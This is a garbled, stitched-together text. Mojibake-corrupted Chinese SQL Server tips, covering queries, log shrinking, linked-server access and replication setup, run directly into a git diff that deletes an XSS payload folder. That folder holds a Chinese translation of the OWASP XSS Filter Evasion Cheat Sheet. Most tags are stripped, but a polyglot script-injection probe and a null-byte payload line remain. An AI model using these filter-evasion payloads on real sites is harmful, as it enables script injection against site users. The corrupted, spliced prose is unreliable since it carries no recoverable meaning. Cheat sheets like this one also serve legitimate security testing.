topֶ߼ģѯĽʵʱеIJһ£߼епܺݱеIJһ£ѯʱȲѯ - -14˵ǰ10¼ -select top 10 * form table1 where Χ - -15˵ѡÿһbֵͬжӦaļ¼Ϣ(÷̳ÿа,ÿƷ,Ŀɼ,ȵ.) -select a,b,c from tablename ta where a=(select max(a) from tablename tb where tb.b=ta.b) - -16˵ TableAе TableBTableCевظжһ -(select a from tableA ) except (select a from tableB) except (select a from tableC) - -17˵ȡ10 -select top 10 * from tablename order by newid() - -18˵ѡ¼ -select newid() - -19˵ɾظ¼ -1),delete from tablename where id not in (select max(id) from tablename group by col1,col2,...) 
-2),select distinct * into temp from tablename - delete from tablename - insert into tablename select * from temp -ۣ ֲǣݵƶʺϴݲ -3),磺һⲿеݣijЩԭһֻһ֣жϾλãֻһȫ룬ҲͲöظֶΣɾظֶ - -alter table tablename ---һ -add column_b int identity(1,1) - delete from tablename where column_b not in( -select max(column_b) from tablename group by column1,column2,...) -alter table tablename drop column column_b - -20˵гݿеı -select name from sysobjects where type='U' // Uû - -21˵ге -select name from syscolumns where id=object_id('TableName') - -22˵ʾtypevenderpcsֶΣtypeֶУcaseԷʵֶѡselect еcase -select type,sum(case vender when 'A' then pcs else 0 end),sum(case vender when 'C' then pcs else 0 end),sum(case vender when 'B' then pcs else 0 end) FROM tablename group by type -ʾ -type vender pcs - A 1 - A 1 - B 2 - A 2 -ֻ B 3 -ֻ C 3 - -23˵ʼtable1 - -TRUNCATE TABLE table1 - -24˵ѡ1015ļ¼ -select top 5 * from (select top 15 * from table order by id asc) table_ order by id desc - - - -11=11=2ʹãSQLʱõĽ϶ - -where 1=1 DZʾѡȫ where 1=2ȫѡ -磺 -if @strWhere !='' -begin -set @strSQL = 'select count(*) as Total from [' + @tblName + '] where ' + @strWhere -end -else -begin -set @strSQL = 'select count(*) as Total from [' + @tblName + ']' -end - -ǿֱд -δҵĿ¼ -set @strSQL = 'select count(*) as Total from [' + @tblName + '] where 1=1 '+ @strWhere 2ݿ ---ؽ -DBCC REINDEX -DBCC INDEXDEFRAG ---ݺ־ -DBCC SHRINKDB -DBCC SHRINKFILE - -3ѹݿ -dbcc shrinkdatabase(dbname) - -4תݿûѴûȨ -exec sp_change_users_login 'update_one','newname','oldname' -go - -5鱸ݼ -RESTORE VERIFYONLY from disk='E:\dvbbs.bak' - -6޸ݿ -ALTER DATABASE [dvbbs] SET SINGLE_USER -GO -DBCC CHECKDB('dvbbs',repair_allow_data_loss) WITH TABLOCK -GO -ALTER DATABASE [dvbbs] SET MULTI_USER -GO - -7־ -SET NOCOUNT ON -DECLARE @LogicalFileName sysname, - @MaxMinutes INT, - @NewSize INT - -USE tablename -- Ҫݿ -SELECT @LogicalFileName = 'tablename_log', -- ־ļ -@MaxMinutes = 10, -- Limit on time allowed to wrap log. 
- @NewSize = 1 -- 趨־ļĴС(M) - -Setup / initialize -DECLARE @OriginalSize int -SELECT @OriginalSize = size - FROM sysfiles - WHERE name = @LogicalFileName -SELECT 'Original Size of ' + db_name() + ' LOG is ' + - CONVERT(VARCHAR(30),@OriginalSize) + ' 8K pages or ' + - CONVERT(VARCHAR(30),(@OriginalSize*8/1024)) + 'MB' - FROM sysfiles - WHERE name = @LogicalFileName -CREATE TABLE DummyTrans - (DummyColumn char (8000) not null) - -DECLARE @Counter INT, - @StartTime DATETIME, - @TruncLog VARCHAR(255) -SELECT @StartTime = GETDATE(), - @TruncLog = 'BACKUP LOG ' + db_name() + ' WITH TRUNCATE_ONLY' - -DBCC SHRINKFILE (@LogicalFileName, @NewSize) -EXEC (@TruncLog) --- Wrap the log if necessary. -WHILE @MaxMinutes > DATEDIFF (mi, @StartTime, GETDATE()) -- time has not expired - AND @OriginalSize = (SELECT size FROM sysfiles WHERE name = @LogicalFileName) - AND (@OriginalSize * 8 /1024) > @NewSize - BEGIN -- Outer loop. -SELECT @Counter = 0 - WHILE ((@Counter < @OriginalSize / 16) AND (@Counter < 50000)) - BEGIN -- update - INSERT DummyTrans VALUES ('Fill Log') DELETE DummyTrans - SELECT @Counter = @Counter + 1 - END - -SELECT 'Final Size of ' + db_name() + ' LOG is ' + - CONVERT(VARCHAR(30),size) + ' 8K pages or ' + - CONVERT(VARCHAR(30),(size*8/1024)) + 'MB' - FROM sysfiles - WHERE name = @LogicalFileName -DROP TABLE DummyTrans -SET NOCOUNT OFF - -8˵ij -exec sp_changeobjectowner 'tablename','dbo' - -9洢ȫ - -CREATE PROCEDURE dbo.User_ChangeObjectOwnerBatch -@OldOwner as NVARCHAR(128), -@NewOwner as NVARCHAR(128) -AS - -DECLARE @Name as NVARCHAR(128) -DECLARE @Owner as NVARCHAR(128) -DECLARE @OwnerName as NVARCHAR(128) - -DECLARE curObject CURSOR FOR -select 'Name' = name, - 'Owner' = user_name(uid) -from sysobjects -where user_name(uid)=@OldOwner -order by name - -OPEN curObject -FETCH NEXT FROM curObject INTO @Name, @Owner -WHILE(@@FETCH_STATUS=0) -BEGIN -if @Owner=@OldOwner - -begin - set @OwnerName = @OldOwner + '.' 
+ rtrim(@Name) - exec sp_changeobjectowner @OwnerName, @NewOwner -end --- select @name,@NewOwner,@OldOwner - -FETCH NEXT FROM curObject INTO @Name, @Owner -END - -close curObject -deallocate curObject -GO - - -10SQL SERVERֱѭд -declare @i int -set @i=1 -while @i<30 -begin - insert into test (userid) values(@i) - set @i=@i+1 -end - -±ҪЛ]мijɿÿL0.1ĻAϣʹü: - - Name score - - Zhangshan 80 - - Lishi 59 - - Wangwu 50 - - Songquan 69 - -while((select min(score) from tb_table)<60) - -begin - -update tb_table set score =score*1.01 - -where score<60 - -if (select min(score) from tb_table)>60 - - break - - else - - continue - -end - - - -ݿ- - - -1.ϱʻ: -Select * From TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as //ٵ - -2.ݿ: -select encrypt('ԭʼ') -select pwdencrypt('ԭʼ') -select pwdcompare('ԭʼ','ܺ') = 1--ͬͬ encrypt('ԭʼ') -select pwdencrypt('ԭʼ') -select pwdcompare('ԭʼ','ܺ') = 1--ͬͬ - -3.ȡرֶ: -declare @list varchar(1000), -@sql nvarchar(1000) -select @list=@list+','+b.name from sysobjects a,syscolumns b where a.id=b.id and a.name='A' -set @sql='select '+right(@list,len(@list)-1)+' from A' -exec (@sql) - -4.鿴Ӳ̷: -EXEC master..xp_fixeddrives - -5.ȽA,BǷ: -if (select checksum_agg(binary_checksum(*)) from A) - = - (select checksum_agg(binary_checksum(*)) from B) -print '' -else -print '' - -6.ɱе¼̽: -DECLARE hcforeach CURSOR GLOBAL FOR SELECT 'kill '+RTRIM(spid) FROM master.dbo.sysprocesses -WHERE program_name IN('SQL profiler',N'SQL ¼̽') -EXEC sp_msforeach_worker '?' 
- -7.¼: -ͷN¼ -Select Top N * From -------------------------------- -NM¼(ҪID) -Select Top M-N * From Where ID in (Select Top M ID From ) Order by ID Desc ----------------------------------- -Nβ¼ -Select Top N * From Order by ID Desc - -1һűһ¼ĵһֶ RecID ֶΣ дһSQL䣬 ҳĵ3140¼ - - select top 10 recid from A where recid not in(select top 30 recid from A) - -дijЩ⣬recidڱд߼ - - select top 10 recid from A whereǴвңselect top 30 recid from Aݱвңе˳пܺݱеIJһ£͵²ѯIJDZõݡ - - - -1order by select top 30 recid from A order by ricid ֶβͻ - -2ǸӲѯҲselect top 30 recid from A where recid>-1 - -2ѯе¼֪ж,Լṹ -set @s = 'select top 1 * from T where pid not in (select top ' + str(@count-1) + ' pid from T)' - -print @s exec sp_executesql @s - -9ȡǰݿеû -select Name from sysobjects where xtype='u' and status>=0 - -10ȡijһֶ -select name from syscolumns where id=object_id('') - -select name from syscolumns where id in (select id from sysobjects where type = 'u' and name = '') - -ַʽЧͬ - -11鿴ijһصͼ洢̡ -select a.* from sysobjects a, syscomments b where a.id = b.id and b.text like '%%' - -12鿴ǰݿд洢 -select name as 洢 from sysobjects where xtype='P' - -13ѯûݿ -select * from master..sysdatabases D where sid not in(select sid from master..syslogins where name='sa') - -select dbid, name AS DB_NAME from master..sysdatabases where sid <> 0x01 - -14ѯijһֶκ -select column_name,data_type from information_schema.columns -where table_name = '' - -15ͬݿ֮ݲ - ---ӷ - -exec sp_addlinkedserver 'ITSV ', ' ', 'SQLOLEDB ', 'Զ̷ipַ ' - -exec sp_addlinkedsrvlogin 'ITSV ', 'false ',null, 'û ', ' ' - ---ѯʾ - -select * from ITSV.ݿ.dbo. - ---ʾ - -select * into from ITSV.ݿ.dbo. - ---Ժʹʱɾӷ - -exec sp_dropserver 'ITSV ', 'droplogins ' - - - ---Զ/(openrowset/openquery/opendatasource) - ---1openrowset - ---ѯʾ - -select * from openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.) - ---ɱر - -select * into from openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.) - - - ---ѱرԶ̱ - -insert openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.) 
- -select *from ر - ---±ر - -update b - -set b.A=a.A - - from openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.)as a inner join ر b - -on a.column1=b.column1 - ---openquery÷Ҫһ - ---ȴһӴӷ - -exec sp_addlinkedserver 'ITSV ', ' ', 'SQLOLEDB ', 'Զ̷ipַ ' - ---ѯ - -select * - -FROM openquery(ITSV, 'SELECT * FROM ݿ.dbo. ') - ---ѱرԶ̱ - -insert openquery(ITSV, 'SELECT * FROM ݿ.dbo. ') - -select * from ر - ---±ر - -update b - -set b.B=a.B - -FROM openquery(ITSV, 'SELECT * FROM ݿ.dbo. ') as a - -inner join ر b on a.A=b.A - - - ---3opendatasource/openrowset - -SELECT * - -FROM opendatasource( 'SQLOLEDB ', 'Data Source=ip/ServerName;User ID=½;Password= ' ).test.dbo.roy_ta - ---ѱرԶ̱ - -insert opendatasource( 'SQLOLEDB ', 'Data Source=ip/ServerName;User ID=½;Password= ').ݿ.dbo. - -select * from ر - -SQL Server - -SQL Server - -1.ַ - -1,datalength(Char_expr) ַַ,Ŀո -2,substring(expression,start,length) ȡӴַ±Ǵӡ1startΪʼλãlengthΪַȣʵӦlen(expression)ȡ䳤 -3,right(char_expr,int_expr) ַұߵint_exprַleft֮෴ -4,isnull( check_expression , replacement_value )check_expressionգtreplacement_valueֵգͷcheck_expressionַ - -5,Sp_addtypeԶx -磺EXEC sp_addtype birthday, datetime, 'NULL' - -6,set nocount {on|off} - -ʹصĽвй Transact-SQL ӰϢ洢аһЩ䲢ʵʵݣڴ˿ܡSET NOCOUNT ִлʱãڷʱáSET NOCOUNT Ϊ ON ʱؼʾ Transact-SQL Ӱ - - - -SET NOCOUNT - -Ϊ OFF ʱؼ - -ʶ - - - -SQLѯУfromԸűͼ256SQLг Order by,ѯʱ򣬺ȡSQLУһֶε8000nvarchar(4000),nvarcharUnicode롣 - - - -SQLServer2000 - -ͬƼʵֲ - -һ Ԥ - -1.,ķһͬwindowsû,ͬ,ΪļеЧû------û--Ҽû--½û--һadministratorĵ½windowsûSynUser2.ڷ,½һĿ¼,ΪĿļĴĿ¼,: - -ҵĵ--D:\ ½һĿ¼,Ϊ: PUB - ---Ҽ½Ŀ¼------ѡ"ļ"--ͨ"Ȩ"ŦþûȨ,֤һдû(SynUser) жԸļеȨ - - - ---ȷ3.SQL(SQLSERVERAGENT)û(/ķ) - -ʼ------ - ---ҼSQLSERVERAGENT----½--ѡ"˻"--ѡһдwindows¼ûSynUser--""û4.SQL Server֤ģʽ,ʱȨ(/ķ) - -ҵ - ---ҼSQLʵ----ȫ--֤--ѡ"SQL Server Windows"--ȷ5.ڷͶķϻע - -ҵ - ---ҼSQL Server--½SQL Serverע...--һ--õķ,ҪעԶ̷ ----һ--ʹ,ѡڶ"SQL Server֤"--һ--û루SynUser--һ--ѡSQL Server,ҲԴһ--һ--6.ֻIP,ü,Ϊע˲ʵʩûõ (Ӷ,,ڶķõĻ,ǷIP) - -ʼ----Microsoft SQL Server--ͻʵù - 
-------ѡ"tcp/ip"--SQL--Ӳ--SQLipַ--޸SQLĶ˿,ȡѡ"̬˿",ӦĶ˿ں - - ʽ - -1÷ - -ҵڷBCDִ²: - -(1) []˵[]Ӳ˵ѡ[÷ķͷַ]÷ͷַ(2) [һ] ѡַ ѡѷԼΪַsqlķѡԼ(3) [һ] ÿļ - -Ĭ\\servername\Pub - -(4) [һ] Զ - -ѡ:,÷ַݿ÷÷ - -,ʹĬãƼ - -(5) [һ] ÷ַݿƺλ Ĭֵ(6) [һ] ÷ ѡΪķ(7) [һ] ѡҪݿͷ(8) [һ] ѡעᶩķ(9) [һ] 2 - -BCD - -(1)[]˵[]Ӳ˵ѡ[͹](2)ѡҪݿ⣬Ȼ󵥻[](3)[]ʾԻе[һ]ϵͳͻᵯһԻ򡣶ԻϵǸƵ͡ѡһҲĬϵĿշ(ҿȥ)(4)[һ]ϵͳҪָԶĸ÷ݿ,SQLSERVERڲͬݿ orACLEACCESS֮ݸơ - -ѡ"SQL SERVER 2000"ݿ - -(5)[һ]ϵͳ͵һµĶԻҲѡҪı - -ע: ǰѡ񷢲 һֻѡı - -(6)ѡ񷢲ƺ(7)Զ巢 ṩѡ: - - ҽԶɸѡ,ĺͻԶ - - ָʽ Զķʽ - -(8)[һ] ѡɸѡķʽ(9)[һ] ѡǷ1)ѡ,ҪڷӶķ - -: []->[]->[÷ķͷַ]->[ķ] - -ڶķʱֵʾ:ķ - -ȻҪ½취 - -[ҵ]->[]->[]->[]->[ѡ] ѡ2)ѡ,öķʱʾ(10)[һ] ÿ (11)[һ] - -ɳĴ󴴽ݿҲͱһݿ - - - -srv1...authorֶ:id,name,phone, srv2...authorֶ:id,name,telphone,adress - - - -Ҫ - -srv1...authorӼ¼srv1...author¼srv1...authorphoneֶθ£srv1...authorӦֶtelphone - ---*/ - - - ---µĴ--1. srv1 ϴӷ,Ա srv1 в srv2,ʵͬexec sp_addlinkedserver 'srv2','','SQLOLEDB','srv2sqlʵip' exec sp_addlinkedsrvlogin 'srv2','false',null,'û','' - -go - ---2. srv1 srv2 ̨, msdtc(ֲʽ),ΪԶ - -ҵĵ--------Ҽ Distributed Transaction Coordinator------ΪԶ - -go - - - - - ---Ȼ󴴽һҵʱͬ洢̾ - - - -ҵ - -----SQL Server--Ҽҵ--½ҵ--""ҵ--""--½--""벽--""ѡ"Transact-SQL ű(TSQL)" --"ݿ"ѡִݿ--""Ҫִе: exec p_process --ȷ--""--½--""--""ѡҵִа--ѡ"" --""ʱ䰲 - - - -ȻSQL Agent,ΪԶ,ҵᱻִ - - -÷: - -ҵĵ--------Ҽ SQLSERVERAGENT------ѡ"Զ"--ȷ. - - ---3.ʵͬķ2,ʱͬ - - - ---srv1дµͬ洢 - -create proc p_process - -as - ---޸Ĺ - -update b set name=i.name,telphone=i.telphone - -from srv2..dbo.author b,author i - -where b.id=i.id and - -(b.name <> i.name or b.telphone <> i.telphone) - - - ---insert srv2..dbo.author(id,name,telphone) - -select id,name,telphone from author i - -where not exists( - -select * from srv2..dbo.author where id=i.id) - - - ---ɾѾɾ(ҪĻ) - -delete b - -from srv2..dbo.author b - -where not exists( - -select * from author where id=b.id) - -go 
diff --git a/payloads/XSS/EVADING ALL WEB-APPLICATION.pdf b/payloads/XSS/EVADING ALL WEB-APPLICATION.pdf
deleted file mode 100644
index 6d7f2ec..0000000
Binary files a/payloads/XSS/EVADING ALL WEB-APPLICATION.pdf and /dev/null differ
diff --git a/payloads/XSS/README.MD b/payloads/XSS/README.MD
deleted file mode 100644
index 0f90f09..0000000
--- a/payloads/XSS/README.MD
+++ /dev/null
@@ -1 +0,0 @@
-# some useful payloads collected from internet may give you a hand.maybe it would do you a favorite
diff --git a/payloads/XSS/XSS-Filter-Evasion-Cheat-Sheet-CN.txt b/payloads/XSS/XSS-Filter-Evasion-Cheat-Sheet-CN.txt
deleted file mode 100644
index 0cd971c..0000000
--- a/payloads/XSS/XSS-Filter-Evasion-Cheat-Sheet-CN.txt
+++ /dev/null
@@ -1,817 +0,0 @@
-XSS Filter Evasion Cheat Sheet İ
-==================================
-Դĵַhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
-
-ĵgithubַhttps://github.com/caomulaodao/XSS-Filter-Evasion-Cheat-Sheet-CN
-
------
-##xss ̽##
-עЩ룬ڴûxssҪܽűĵطᵯʡxssʹ[url][1]ȥ롣СɣǼеҪȥһҳ棬ֻͨҪע "<ַ>" ǩȻжǷܵžͿжǷxss©ˡ
-
- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
- alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
- >">'>
-
--------
-
-##xss ̽2##
-ûгռȥҳǷxss©δһõļxssע롣עδ󣬲鿴ҳԴѰǷڿ =&{()}
-
---------
-##޹ƹ##
-һxssע룬ȻͨᱻǽȥDzҪκִУʡ
-
-
-
--------
-
--------
-##ͨjavascriptָʵֵͼƬxss##
-
-ͼƬxssjavascriptָʵ֡IE7.0֧javascriptָͼƬУǿĴչʾһǩͨõԭ
-
-
-
------
-##޷ֺ##
-
-
-
------
-##ִСдxss##
-
-
-
-------
-##html ʵ##
-The semicolons are required for this to work:
-
-
-
------
-####
-javascriptҪͬʱʹõź˫ţôʹ`javascript롣ҲdzΪxss˴δǵַ
-
-
-
------
-##εAǩ##
-hrefԣֱӻȡxssʵʹ...David Cross ~ ֤chrome
-
- xxs link
-
-⣬chromeϲȥȫȱʧΪ㡣谭ôֱʡǰɣchromeȷİ㲹ȫȱʧURLscriptС
-
- xxs link
-
------
-##εIMGǩ##
-类 Begeek֣ԶСɾκxssɢȾIMGǩбŰַʵ֡Ҳ²Ϊȷʵ֣ȥhtml
-
- ">
-
-----
-##fromCharCode##
-ûκʽűeval()һfromCharCodejavascriptκҪxss
-
-
-
-----
-##ĬSRCȥƹSRC##
-⽫ƹSRCjavascriptκһ¼ͬκһHTMLǩFormIframeInputEmbedȵȡҲκθñǩ¼ȥ滻onblur, onclickȣǻḽһõ¼бDavid CrossṩAbdullah Hussam༭
-
-
-
---
-##ĬSRCͨʡֵ##
-
-
-
---
-##ĬSRCͨȫ##
-
-
-
---
-##ͨerror¼alert##
-
-
-
---
-##ʮhtml##
-ʹjavascriptָxssʾ޷ Firefox Netscape 8.1+Ϊʹ Gecko Ⱦ档ʹ XSS [Calculator][2] ȡϢ
-
-
-
----
-##βûзֺŵʮhtml##
-ǾõƹѰ"&#XX;"ʽxssˣΪ˲֪7λַıơҲõĶЩַ$tmp_string =~ s/.*\&#(\d+);.*/$1/; Ĺ,ǴΪһhtmlҪ;ȥз֣
-
-
-
----
-##βûзֺŵʮhtml##
-Ҳһʵõxssĵ$tmp_string =~ s/.*\&#(\d+);.*/$1/; Ϊֱ#棨ʮhtnl벢ˣʹ XSS [Calculator][3] ȡϢ
-
-
-
--
-##ǶTAB##
-ֿxss
-
-
-
--
-##ǶTAB##
-ֿxss
-
-
-
---
-##Ƕзȥֿxss##
-һЩվ09-13ַʮƣʵʽĹDzȷġֻ09(tab), 10 () 13 (س)ʹáԲ鿴asciiΪϸϢĸxssչʾ
-
-
-
----
-##سȥֿxss##
-ע⣺ұдxssַȱ볤ȵַԭ0ԱʡԡͨҿĹʮƺʮƵıַȷӦһ߸ַ
-
-
-
--
-##ûзָjavascriptָ##
-nullַҲΪһxssͬ档ҪֱעһЩBurp Proxyʹ %00 urlַдԼע빤ʹvim^V^@ nullԼijȥһıļСðɣһˡ Operaϰ汾Լ 7.11 on WindowsǴĶһַ173ַnullַ %00 Ǹӵû߰ƹijЩʵڵĹͨ䶯еġ
-
- perl -e 'print "";' > out
-
------
-##IMGjavascript֮ǰӿոԪַΪxssƹ##
-xssƴģʽûпǵ"javascript:"пܴڿոȷģΪ޷ȾҲ˴ļΪ㲻һոź "javascript:" ֮䡣ʵԲ 1-32ַʮƣеκַ
-
-
-
------
-##ĸַxss##
- Firefox htmlΪһĸַһhtmlؼвЧģЩַᱻΪհ׷Чtokenhtmlǩ֮⵼ºܶxssΪhtmlǩDZհ׷ϵġ磬"
-
-ԭͬǼGeckoȾĸ֡htmlװַκַλ¼Ⱥ֮䡣ǿƹxssעҲʾ
-
-
-
-Yair Amit ʾһС ieGecko Ⱦ֮ڲʹÿո£GeckoһбhtmlǩͲ֮䡣õЩոϵͳС
-
-
-
------
-##Ŀ##
- Franz SedlmaierxssƹijЩ棬ΪЩͨƴֵһԼţȡڲΪǩûʹøЧ㷨 Boyer-MooreѰҴ򿪵ļԼرǩģƴ䣩󣬴е˫бܿƶŵµjavascript
-
- <
-
-----
-##ûرյscriptǩ##
-ʹ GeckoȾFirefox Netscape 8.1 㲢Ҫxss"></SCRIPT>"ⲿ֡ FirefoxպϱǩҼǩô Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. ҪԼţͨDZġע⣬Ҳ뱻עhtmlպϳʲôӡ
-
- ڽβ OperaǷdzõ볤ܵơԽԽá ".j"ЧģҪDZΪԶʶһscriptǩС
-
-
-
-----
-##INPUT image##
-
-
-
-----
-##BODY image##
-
-
-
----
-##IMG DYNSRC(Ƶ) ##
-
-
-
--
-##IMG lowsrcͷֱͼƬ##
-
-
-
-----
-##List-style-image##
-
-